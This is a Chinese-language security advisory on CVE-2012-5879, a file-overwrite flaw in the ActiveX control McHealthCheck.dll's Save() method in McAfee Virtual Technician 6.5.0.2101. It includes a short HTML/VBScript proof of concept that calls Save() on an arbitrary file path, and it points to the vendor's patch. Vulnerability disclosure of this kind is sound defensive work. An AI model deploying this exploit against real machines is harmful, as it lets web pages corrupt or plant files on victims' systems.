安全研究

安全漏洞
McAfee Virtual Technician ActiveX 控件'Save()'方法文件覆盖漏洞

发布日期:2013-03-27
更新日期:2013-03-28

受影响系统:
McAfee Virtual Technician 6.5.0.2101
描述:
BUGTRAQ  ID: 58750
CVE(CAN) ID: CVE-2012-5879

McAfee Virtual Technician是分析诊断工具。

McAfee Virtual Technician 6.5.0.2101及其他版本的ActiveX控件存在安全漏洞可导致攻击者覆盖或创建受影响应用上下文内的任意文件。该安全漏洞存在于"McHealthCheck.dll"的"Save()"方法。



<*来源:High-Tech Bridge Security Research Lab
  
  链接:http://packetstormsecurity.com/files/cve/CVE-2012-5879
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html>
<h4>McAfee Virtual Technician [McHealthCheck.dll] v.6.5.0.2101</h4>
<h5>This proof of concepts creates an arbitrary file in a system [Windows 7, SP1 with IE 9.0] by leveraging the McHealthCheck.dll ActiveX module and the method "Save()":</h5>
<object classid='clsid:24565A99-ADDA-47B9-9E86-3C4C3360E256' id='target'></object>
<input type="button" value="Boom!" language="VBScript" OnClick="CreateArbitraryFile()">

<script language="VBScript">
sub CreateArbitraryFile()
arg1="FilePath\File_name_to_corrupt_or_create"
target.Save arg1
End Sub

</script>
</html>

建议:
厂商补丁:

McAfee
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.mcafee.com/

浏览次数:4144
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障